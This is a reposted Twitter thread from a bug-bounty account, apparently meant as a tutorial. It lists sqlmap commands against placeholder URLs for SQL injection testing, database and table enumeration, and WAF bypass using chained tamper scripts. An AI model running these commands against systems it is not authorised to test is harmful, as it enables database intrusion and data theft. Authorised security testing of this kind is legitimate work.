Hey ReconOne fam! I've personally used Sqlmap on several occasions and it has proven to be a valuable tool in my security arsenal.
Let's dive into some of its features
👇🧵
#sqlmap #sqli #bugbountyhelp #bugbounty #AttackSurface
1/7 Sqlmap against potential vulnerable Page
$ sqlmap -u https://example. com/page?id=1 -v 3
$ sqlmap -u https://example. com/list --data id=1
$ sqlmap -u https://example. com/internal --cookie=PHPSESSIDabcdef
2/7 Test injection in a specific parameter
$ sqlmap -u https://example. com/page? id=1&page=4&sort=desc&env=*
$ sqlmap -u https://example. com/form --data 'name=asd&page=4&role=admin' -p role
3/7 Tells Sqlmap to use payloads for specific databases
$ sqlmap -u https://example. com/page?id=1 --dbms=MSSQL
$ sqlmap -u https://example. com/page?id=1 --dbms=MySQL
4/7 Use only specific Techniques such as Blind or Time-Based
$ sqlmap -u https://example. com/page?id=3 --technique=BT
5/7 Enumerate the Databases and its content
$ sqlmap -u https://example. com/page?id=2* --dbs --current-user
$ sqlmap -u https://example. com/page?id=2* -D Database1 --tables
6/7 Example of Tamper script to perform WAF Bypass
$ sqlmap -u https://example. com/page?id=2* -- tamper=apostrophemask,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,percentage,randomcase,space2comment,space2randomblank,unmagicquotes
6.1/7 Example of Tamper script to perform WAF Bypass
A comprensive explanation: medium.com/@drag0n/sqlmap…
7/7 From Burp to Sqlmap
1. Take an HTTP Request from Burp Suite -> right click -> save to file eg. "savedRequest.txt"
2. launch sqlmap on it: sqlmap -r savedRequest.txt
That's all for this thread on Sqlmap! Thanks for following along.
Be sure to follow @ReconOne_bk for more informative threads on Recon, tools and techniques.
Share this Scrolly Tale with your friends.
A Scrolly Tale is a new way to read Twitter threads with a more visually immersive experience.
Discover more beautiful Scrolly Tales like this.